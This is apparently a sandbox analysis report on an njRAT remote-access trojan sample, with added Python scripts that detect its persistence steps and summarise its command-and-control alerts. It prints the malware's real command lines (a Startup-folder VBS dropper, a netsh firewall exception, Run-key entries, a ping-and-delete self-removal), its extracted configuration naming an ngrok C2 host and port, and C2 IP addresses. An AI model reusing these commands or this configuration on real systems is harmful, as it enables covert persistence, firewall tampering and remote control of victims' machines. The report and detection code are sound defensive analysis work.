Windows Analysis Report
iR2UtZj5vP.exe

Overview

General Information

Sample name: iR2UtZj5vP.exe (renamed because the original name is a hash value)
Original sample name: 52b074e39e4f3ba00c230ba82eb62499.exe
Analysis ID: 1386934
MD5: 52b074e39e4f3ba00c230ba82eb62499
SHA1: 054a51bf0c25309a728a8bc14c77262168f134a1
SHA256: 4c75f91c9974d712ef96b2f6bfe99edc15f110dea80065a59e161e639d08e74d
Tags: exe, njrat, RAT

Detection

Njrat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Snort IDS alert for network traffic
Yara detected Njrat
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
C2 URLs / IPs found in malware configuration
Command shell drops VBS files
Connects to many ports of the same IP (likely port scanning)
Contain functionality to detect virtual machines
Contains functionality to inject code into remote processes
Contains functionality to log keystrokes (.Net Source)
Creates autostart registry keys with suspicious names
Deletes itself after installation
Disables zone checking for all users
Drops PE files to the startup folder
Drops VBS files to the startup folder
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the windows firewall
Protects its processes via BreakOnTermination flag
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect sandboxes / dynamic malware analysis system (file name check)
Uses netsh to modify the Windows network and firewall settings
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Process Patterns NTDS.DIT Exfil
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Sigma detected: Wscript Shell Run In CommandLine
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w10x64
  • iR2UtZj5vP.exe (PID: 7976 cmdline: C:\Users\user\Desktop\iR2UtZj5vP.exe MD5: 52B074E39E4F3BA00C230BA82EB62499)
    • cmd.exe (PID: 8024 cmdline: C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\Desktop\iR2UtZj5vP.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • iR2UtZj5vP.exe (PID: 8100 cmdline: C:\Users\user\Desktop\iR2UtZj5vP.exe MD5: 52B074E39E4F3BA00C230BA82EB62499)
      • WindowsServices.exe (PID: 7180 cmdline: "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" MD5: 52B074E39E4F3BA00C230BA82EB62499)
        • cmd.exe (PID: 7256 cmdline: C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WindowsServices.exe (PID: 7396 cmdline: C:\Users\user\AppData\Local\Temp\WindowsServices.exe MD5: 52B074E39E4F3BA00C230BA82EB62499)
          • netsh.exe (PID: 7968 cmdline: netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" "WindowsServices.exe" ENABLE MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
            • conhost.exe (PID: 7980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • rundll32.exe (PID: 4180 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • WindowsServices.exe (PID: 340 cmdline: "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" .. MD5: 52B074E39E4F3BA00C230BA82EB62499)
    • cmd.exe (PID: 5664 cmdline: C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WindowsServices.exe (PID: 2928 cmdline: C:\Users\user\AppData\Local\Temp\WindowsServices.exe MD5: 52B074E39E4F3BA00C230BA82EB62499)
  • WindowsServices.exe (PID: 2292 cmdline: "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" .. MD5: 52B074E39E4F3BA00C230BA82EB62499)
    • cmd.exe (PID: 2540 cmdline: C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WindowsServices.exe (PID: 2960 cmdline: C:\Users\user\AppData\Local\Temp\WindowsServices.exe MD5: 52B074E39E4F3BA00C230BA82EB62499)
  • WindowsServices.exe (PID: 2536 cmdline: "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" .. MD5: 52B074E39E4F3BA00C230BA82EB62499)
    • cmd.exe (PID: 4056 cmdline: C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WindowsServices.exe (PID: 4520 cmdline: C:\Users\user\AppData\Local\Temp\WindowsServices.exe MD5: 52B074E39E4F3BA00C230BA82EB62499)
  • cleanup
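The tree above is the whole persistence chain in four command lines: cmd.exe echoes a one-line VBScript launcher into the Startup folder, the copy in %TEMP% writes itself into the HKCU and Wow6432Node Run keys, and netsh.exe adds a firewall exception for a binary in a user-writable directory. The following detection logic is an added example, not Joe Sandbox or Sigma code, and the events it runs over are constructed in a Sysmon-like shape (EventID 1/11/13 field names) from the command lines and registry/file events this report lists; the benign netsh event and the ping-and-delete command line (built from the `cmd.exe /c ping 0 -n 2 & del "` string the Yara rules match) are constructed and do not appear in the tree.

```python
"""Detection logic for the persistence / firewall-tampering chain in the report.
Added example, not Joe Sandbox or Sigma code.  SAMPLE_EVENTS is constructed from
the report's process tree and Sigma hits; only the fields the rules use are kept."""
import re

STARTUP = "\\microsoft\\windows\\start menu\\programs\\startup\\"
# Locations an unprivileged user can write to.  A Run key or a firewall exception
# pointing here is the signal; netsh or a Run key on its own is normal admin noise.
USER_WRITABLE = re.compile(r"\\(appdata|users\\[^\\]+\\desktop|temp|programdata)\\", re.I)
# cmd.exe /c echo ...CreateObject("WScript.Shell").Run ... > ...\Startup\<name>.vbs
VBS_DROP = re.compile(
    r'cmd\.exe.*\becho\b.*wscript\.shell.*>\s*"?[^"]*' + re.escape(STARTUP) + r'[^"]*\.vbs', re.I)
# Legacy "netsh firewall" context (what this sample uses) and the current advfirewall syntax.
NETSH_ALLOW = re.compile(
    r"netsh\s+(?:advfirewall\s+firewall\s+add\s+rule|firewall\s+add\s+allowedprogram)\b", re.I)
# "cmd.exe /c ping 0 -n 2 & del <self>": delay via ping, then delete the original binary.
SELF_DELETE = re.compile(r"cmd\.exe\s*/c\s*ping\b.*&\s*del\b", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\\", re.I)  # HKCU, HKLM and Wow6432Node alike


def analyze(events):
    """Return (rule_name, ProcessId) for every event that matches a rule."""
    findings = []
    for e in events:
        eid = e["EventID"]
        if eid == 1:  # process creation
            cmd = e["CommandLine"]
            if VBS_DROP.search(cmd):
                findings.append(("startup_vbs_dropper", e["ProcessId"]))
            if NETSH_ALLOW.search(cmd) and USER_WRITABLE.search(cmd):
                findings.append(("firewall_allow_user_writable", e["ProcessId"]))
            if SELF_DELETE.search(cmd):
                findings.append(("ping_del_self_delete", e["ProcessId"]))
        elif eid == 13 and RUN_KEY.search(e["TargetObject"]) and USER_WRITABLE.search(e["Details"]):
            findings.append(("run_key_user_writable", e["ProcessId"]))  # registry value set
        elif eid == 11 and STARTUP in e["TargetFilename"].lower():
            findings.append(("startup_folder_write", e["ProcessId"]))  # file created
    return findings


SAMPLE_EVENTS = [  # constructed from the report; see lead-in
    {"EventID": 1, "ProcessId": 8024,
     "CommandLine": r'C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\Desktop\iR2UtZj5vP.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"'},
    {"EventID": 1, "ProcessId": 7968,
     "CommandLine": r'netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" "WindowsServices.exe" ENABLE'},
    {"EventID": 13, "ProcessId": 7396,
     "TargetObject": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bf497657d005804b657fde8dd2d0cb46",
     "Details": r'"C:\Users\user\AppData\Local\Temp\WindowsServices.exe" ..'},
    {"EventID": 11, "ProcessId": 7396,
     "TargetFilename": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bf497657d005804b657fde8dd2d0cb46.exe"},
    # constructed: a firewall exception for an installed program, which must not fire
    {"EventID": 1, "ProcessId": 4242,
     "CommandLine": r'netsh advfirewall firewall add rule name="App" dir=in action=allow program="C:\Program Files\App\app.exe"'},
    # constructed from the "cmd.exe /c ping 0 -n 2 & del" string in the Yara matches
    {"EventID": 1, "ProcessId": 9999,
     "CommandLine": r'cmd.exe /c ping 0 -n 2 & del "C:\Users\user\Desktop\iR2UtZj5vP.exe"'},
]

if __name__ == "__main__":
    for rule, pid in analyze(SAMPLE_EVENTS):
        print(f"{rule:32s} pid={pid}")
```

The user-writable-path test is what keeps the netsh and Run-key rules quiet on an ordinary workstation: installers add firewall exceptions and Run values all day, but they point into Program Files, not into %TEMP% or the user's Desktop.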
Name: NjRAT
Description: RedPacket Security describes NJRat as "a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives." It is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored.
Attribution:
  • AQUATIC PANDA
  • Earth Lusca
  • Operation C-Major
  • The Gorgon Group
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat

Extracted malware configuration (Njrat):
{"Campaign ID": "David", "Version": "0.7d", "Install Name": "bf497657d005804b657fde8dd2d0cb46", "Install Dir": "TEMP", "Registry Value": "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "Host": "0.tcp.in.ngrok.io", "Port": "19208", "Network Seprator": "Y262SUCZ4UJJ"}
Yara matches (memory dumps):

Source: 00000004.00000002.1423595922.0000000000402000.00000040.00000400.00020000.00000000.sdmp
  Rule: JoeSecurity_Njrat; Description: Yara detected Njrat; Author: Joe Security
  Rule: Windows_Trojan_Njrat_30f3c220; Description: unknown; Author: unknown
    • 0x5567:$a1: get_Registry
    • 0x6934:$a2: SEE_MASK_NOZONECHECKS
    • 0x6744:$a3: Download ERROR
    • 0x6a6c:$a4: cmd.exe /c ping 0 -n 2 & del "
    • 0x6a0c:$a5: netsh firewall delete allowedprogram "
  Rule: njrat1; Description: Identify njRat; Author: Brian Wallace @botnet_hunter
    • 0x6964:$a1: netsh firewall add allowedprogram
    • 0x6934:$a2: SEE_MASK_NOZONECHECKS
    • 0x6af4:$b1: [TAP]
    • 0x6a6c:$c3: cmd.exe /c ping
  Rule: Njrat; Description: detect njRAT in memory; Author: JPCERT/CC Incident Response Group
    • 0x6934:$reg: SEE_MASK_NOZONECHECKS
    • 0x6720:$msg: Execute ERROR
    • 0x6780:$msg: Execute ERROR
    • 0x6a6c:$ping: cmd.exe /c ping 0 -n 2 & del
Source: 00000019.00000001.1855089629.000000000040E000.00000040.00000001.00020000.00000000.sdmp
  Rule: JoeSecurity_Njrat; Description: Yara detected Njrat; Author: Joe Security
(107 further memory-dump matches not shown)

Yara matches (unpacked PE files):

Source: 18.2.WindowsServices.exe.25c0000.2.raw.unpack
  Rule: JoeSecurity_Njrat; Description: Yara detected Njrat; Author: Joe Security
  Rule: Windows_Trojan_Njrat_30f3c220; Description: unknown; Author: unknown
    • 0x5767:$a1: get_Registry
    • 0x6b34:$a2: SEE_MASK_NOZONECHECKS
    • 0x6944:$a3: Download ERROR
    • 0x6c6c:$a4: cmd.exe /c ping 0 -n 2 & del "
    • 0x6c0c:$a5: netsh firewall delete allowedprogram "
  Rule: CN_disclosed_20180208_c; Description: Detects malware from disclosed CN malware set; Author: Florian Roth
    • 0x6c6c:$x1: cmd.exe /c ping 0 -n 2 & del "
    • 0x683e:$s1: winmgmts:\\.\root\SecurityCenter2
    • 0x6966:$s3: Executed As
    • 0x5fb3:$s5: Stub.exe
    • 0x6944:$s6: Download ERROR
    • 0x6800:$s8: Select * From AntiVirusProduct
  Rule: njrat1; Description: Identify njRat; Author: Brian Wallace @botnet_hunter
    • 0x6b64:$a1: netsh firewall add allowedprogram
    • 0x6b34:$a2: SEE_MASK_NOZONECHECKS
    • 0x6cf4:$b1: [TAP]
    • 0x6c6c:$c3: cmd.exe /c ping
  Rule: Njrat; Description: detect njRAT in memory; Author: JPCERT/CC Incident Response Group
    • 0x6b34:$reg: SEE_MASK_NOZONECHECKS
    • 0x6920:$msg: Execute ERROR
    • 0x6980:$msg: Execute ERROR
    • 0x6c6c:$ping: cmd.exe /c ping 0 -n 2 & del
(119 further unpacked-PE matches not shown)

System Summary

Source: Registry Key set; Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing; Data: Details: "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" .., EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\WindowsServices.exe, ProcessId: 7396, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bf497657d005804b657fde8dd2d0cb46
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" .., EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\WindowsServices.exe, ProcessId: 7396, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bf497657d005804b657fde8dd2d0cb46
Source: File created; Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research); Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\WindowsServices.exe, ProcessId: 7396, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bf497657d005804b657fde8dd2d0cb46.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\WindowsServices.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\WindowsServices.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\WindowsServices.exe, ParentCommandLine: C:\Users\user\Desktop\iR2UtZj5vP.exe, ParentImage: C:\Users\user\Desktop\iR2UtZj5vP.exe, ParentProcessId: 8100, ParentProcessName: iR2UtZj5vP.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" , ProcessId: 7180, ProcessName: WindowsServices.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" .., EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\WindowsServices.exe, ProcessId: 7396, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\bf497657d005804b657fde8dd2d0cb46
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\Desktop\iR2UtZj5vP.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs", CommandLine: C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\Desktop\iR2UtZj5vP.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\Desktop\iR2UtZj5vP.exe, ParentImage: C:\Users\user\Desktop\iR2UtZj5vP.exe, ParentProcessId: 7976, ParentProcessName: iR2UtZj5vP.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\Desktop\iR2UtZj5vP.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs", ProcessId: 8024, ProcessName: cmd.exe

Data Obfuscation

Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 8024, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs
Snort IDS alerts (SID 2033132, protocol TCP, classtype "A Network Trojan was detected"), in chronological order:

Timestamp                 Source              Destination
02/05/24-17:11:46.647234  192.168.2.11:49705  3.6.122.107:19208
02/05/24-17:11:51.063759  192.168.2.11:49706  3.6.122.107:19208
02/05/24-17:11:55.885933  192.168.2.11:49707  3.6.122.107:19208
02/05/24-17:12:00.269481  192.168.2.11:49708  3.6.122.107:19208
02/05/24-17:12:05.752627  192.168.2.11:49709  3.6.122.107:19208
02/05/24-17:12:12.529858  192.168.2.11:49711  3.6.122.107:19208
02/05/24-17:12:17.572819  192.168.2.11:49712  3.6.122.107:19208
02/05/24-17:12:21.856556  192.168.2.11:49713  3.6.122.107:19208
02/05/24-17:12:25.474260  192.168.2.11:49715  3.6.122.107:19208
02/05/24-17:12:30.626186  192.168.2.11:49716  3.6.122.107:19208
02/05/24-17:12:34.128286  192.168.2.11:49717  3.6.122.107:19208
02/05/24-17:12:37.780074  192.168.2.11:49718  3.6.122.107:19208
02/05/24-17:12:42.069121  192.168.2.11:49719  3.6.122.107:19208
02/05/24-17:12:47.573414  192.168.2.11:49720  3.6.98.232:19208
02/05/24-17:12:50.977611  192.168.2.11:49721  3.6.98.232:19208
02/05/24-17:12:55.034301  192.168.2.11:49722  3.6.98.232:19208
02/05/24-17:13:00.449419  192.168.2.11:49723  3.6.98.232:19208
02/05/24-17:13:13.604278  192.168.2.11:49724  3.6.98.232:19208
02/05/24-17:13:59.558134  192.168.2.11:49725  3.6.98.232:19208
02/05/24-17:14:07.579174  192.168.2.11:49726  3.6.122.107:19208
02/05/24-17:15:07.884925  192.168.2.11:49727  3.6.122.107:19208
02/05/24-17:15:26.191172  192.168.2.11:49728  3.6.115.182:19208
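Every alert above is a fresh TCP connection (the source port climbs from 49705 to 49728), so the gaps between alerts measure how quickly the stub re-dials its C2, and the destination changes because `0.tcp.in.ngrok.io` is an ngrok TCP-tunnel hostname that resolves to rotating AMAZON-02 edge addresses. The script below is an added example, not part of the Joe Sandbox report: it parses Snort's `alert_fast` format and summarises destinations, ports and reconnect intervals. ALERTS is constructed from the timestamps, ports and destinations in the table; the rule revision (`:2`) and the year (2024, from the `02/05/24` stamps) are assumptions.

```python
"""Reconnect-rate analysis over the Snort alerts in the report.  Added example,
not Joe Sandbox code.  ALERTS is rendered into Snort 'fast' alert format from the
report's table so that the parser sees the same line shape a real alert_fast log
has; the rule revision and the year are assumed."""
import re
from collections import Counter
from datetime import datetime
from statistics import median

MSG = "ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)"
ALERTS = "\n".join(
    f"{ts}  [**] [1:2033132:2] {MSG} [**] [Classification: A Network Trojan was detected] "
    f"[Priority: 1] {{TCP}} 192.168.2.11:{sport} -> {dst}:19208"
    for ts, sport, dst in [  # constructed from the report's Snort table
        ("02/05-17:11:46.647234", 49705, "3.6.122.107"), ("02/05-17:14:07.579174", 49726, "3.6.122.107"),
        ("02/05-17:12:25.474260", 49715, "3.6.122.107"), ("02/05-17:12:30.626186", 49716, "3.6.122.107"),
        ("02/05-17:13:59.558134", 49725, "3.6.98.232"), ("02/05-17:12:21.856556", 49713, "3.6.122.107"),
        ("02/05-17:12:34.128286", 49717, "3.6.122.107"), ("02/05-17:11:51.063759", 49706, "3.6.122.107"),
        ("02/05-17:15:07.884925", 49727, "3.6.122.107"), ("02/05-17:12:47.573414", 49720, "3.6.98.232"),
        ("02/05-17:12:50.977611", 49721, "3.6.98.232"), ("02/05-17:12:05.752627", 49709, "3.6.122.107"),
        ("02/05-17:13:00.449419", 49723, "3.6.98.232"), ("02/05-17:12:12.529858", 49711, "3.6.122.107"),
        ("02/05-17:12:17.572819", 49712, "3.6.122.107"), ("02/05-17:12:42.069121", 49719, "3.6.122.107"),
        ("02/05-17:12:55.034301", 49722, "3.6.98.232"), ("02/05-17:13:13.604278", 49724, "3.6.98.232"),
        ("02/05-17:11:55.885933", 49707, "3.6.122.107"), ("02/05-17:15:26.191172", 49728, "3.6.115.182"),
        ("02/05-17:12:37.780074", 49718, "3.6.122.107"), ("02/05-17:12:00.269481", 49708, "3.6.122.107"),
    ])

# alert_fast: "MM/DD-HH:MM:SS.ffffff  [**] [gid:sid:rev] msg [**] [Classification: ...] [Priority: n] {PROTO} src:sport -> dst:dport"
FAST_RE = re.compile(
    r"^(?P<ts>\d\d/\d\d-\d\d:\d\d:\d\d\.\d+)\s+\[\*\*\]\s+\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+"
    r"(?P<msg>.*?)\s+\[\*\*\].*?\{(?P<proto>\w+)\}\s+"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+(?P<dst>[\d.]+):(?P<dport>\d+)\s*$")


def parse_fast_alerts(text, year=2024):
    """Parse alert_fast lines into dicts sorted by time (the format carries no year)."""
    out = []
    for line in text.splitlines():
        m = FAST_RE.match(line)
        if not m:
            continue  # unrelated or truncated line
        a = m.groupdict()
        a["time"] = datetime.strptime(f"{year}/{a['ts']}", "%Y/%m/%d-%H:%M:%S.%f")
        for k in ("sid", "sport", "dport"):
            a[k] = int(a[k])
        out.append(a)
    return sorted(out, key=lambda a: a["time"])


def reconnect_intervals(alerts):
    """Seconds between consecutive alerts; each alert here is a new connection."""
    t = [a["time"] for a in alerts]
    return [(b - a).total_seconds() for a, b in zip(t, t[1:])]


def summarize(alerts):
    gaps = reconnect_intervals(alerts)
    return {
        "total": len(alerts),
        "sids": sorted({a["sid"] for a in alerts}),
        "dst_counts": dict(Counter(a["dst"] for a in alerts)),
        "dst_ports": sorted({a["dport"] for a in alerts}),
        "median_gap_s": round(median(gaps), 3) if gaps else None,
        "gaps_under_10s": sum(g < 10 for g in gaps),
    }


if __name__ == "__main__":
    for k, v in summarize(parse_fast_alerts(ALERTS)).items():
        print(f"{k}: {v}")
```

Two things the summary makes explicit: all 22 connections go to port 19208, the port in the extracted configuration, so the "connects to many ports of the same IP" signature is not corroborated by the IDS log; and the median gap of roughly five seconds is the stub's reconnect loop, not a scheduled beacon. Because the addresses belong to ngrok's edge rather than to the operator, the durable indicators are the hostname, the port and the SID, not the three IPs.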

AV Detection

Source: iR2UtZj5vP.exe; Avira: detected
Source: 0.tcp.in.ngrok.io; Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bf497657d005804b657fde8dd2d0cb46.exe; Avira: detection malicious, Label: BDS/Poison.mon
Source: 22.2.WindowsServices.exe.2150000.2.raw.unpack; Malware Configuration Extractor: Njrat {"Campaign ID": "David", "Version": "0.7d", "Install Name": "bf497657d005804b657fde8dd2d0cb46", "Install Dir": "TEMP", "Registry Value": "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "Host": "0.tcp.in.ngrok.io", "Port": "19208", "Network Seprator": "Y262SUCZ4UJJ"}
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bf497657d005804b657fde8dd2d0cb46.exe; ReversingLabs: Detection: 86%
Source: iR2UtZj5vP.exe; ReversingLabs: Detection: 86%
Source: Yara match; File sources of type UNPACKEDPE:
  18.2.WindowsServices.exe.25c0000.2.raw.unpack
  4.2.iR2UtZj5vP.exe.400000.0.unpack
  18.2.WindowsServices.exe.25c0000.2.unpack
  1.2.iR2UtZj5vP.exe.2160000.3.unpack
  8.1.WindowsServices.exe.400000.0.unpack
  17.1.WindowsServices.exe.400000.0.unpack
  17.2.WindowsServices.exe.400000.0.unpack
  22.2.WindowsServices.exe.2150000.2.raw.unpack
  18.2.WindowsServices.exe.2590000.1.unpack
  25.2.WindowsServices.exe.400000.0.unpack
  5.2.WindowsServices.exe.4f0000.1.raw.unpack
  21.2.WindowsServices.exe.400000.0.unpack
  4.1.iR2UtZj5vP.exe.400000.0.unpack
  25.1.WindowsServices.exe.400000.0.unpack
  1.2.iR2UtZj5vP.exe.2160000.3.raw.unpack
  22.2.WindowsServices.exe.2150000.2.unpack
  21.1.WindowsServices.exe.400000.0.unpack
  5.2.WindowsServices.exe.4f0000.1.unpack
  14.2.WindowsServices.exe.2030000.2.raw.unpack
  14.2.WindowsServices.exe.2030000.2.unpack
  1.2.iR2UtZj5vP.exe.2130000.1.unpack
Source: Yara match; File sources of type MEMORY:
  00000004.00000002.1423595922.0000000000402000.00000040.00000400.00020000.00000000.sdmp
  00000019.00000001.1855089629.000000000040E000.00000040.00000001.00020000.00000000.sdmp
  00000004.00000001.1338787516.0000000000402000.00000040.00000001.00020000.00000000.sdmp
  00000012.00000002.1747188257.00000000025C0000.00000040.00001000.00020000.00000000.sdmp
  00000019.00000002.1917172495.000000000040E000.00000040.00000400.00020000.00000000.sdmp
  00000011.00000002.1749146703.0000000000402000.00000040.00000400.00020000.00000000.sdmp
  00000015.00000001.1739321784.0000000000402000.00000040.00000001.00020000.00000000.sdmp
  00000001.00000002.1341895171.0000000002160000.00000040.00001000.00020000.00000000.sdmp
  00000005.00000002.1429390738.00000000004F0000.00000040.00001000.00020000.00000000.sdmp
  00000015.00000002.1809054876.000000000040E000.00000040.00000400.00020000.00000000.sdmp
  00000019.00000001.1855089629.0000000000402000.00000040.00000001.00020000.00000000.sdmp
  00000019.00000002.1917172495.0000000000402000.00000040.00000400.00020000.00000000.sdmp
  00000004.00000001.1338787516.000000000040E000.00000040.00000001.00020000.00000000.sdmp
  00000004.00000002.1423595922.000000000040E000.00000040.00000400.00020000.00000000.sdmp
  00000008.00000001.1426610906.000000000040E000.00000040.00000001.00020000.00000000.sdmp
  00000016.00000002.1875231931.0000000002150000.00000040.00001000.00020000.00000000.sdmp
  00000011.00000002.1749146703.000000000040E000.00000040.00000400.00020000.00000000.sdmp
  00000008.00000001.1426610906.0000000000402000.00000040.00000001.00020000.00000000.sdmp
  00000011.00000001.1677403153.000000000040E000.00000040.00000001.00020000.00000000.sdmp
  00000015.00000001.1739321784.000000000040E000.00000040.00000001.00020000.00000000.sdmp
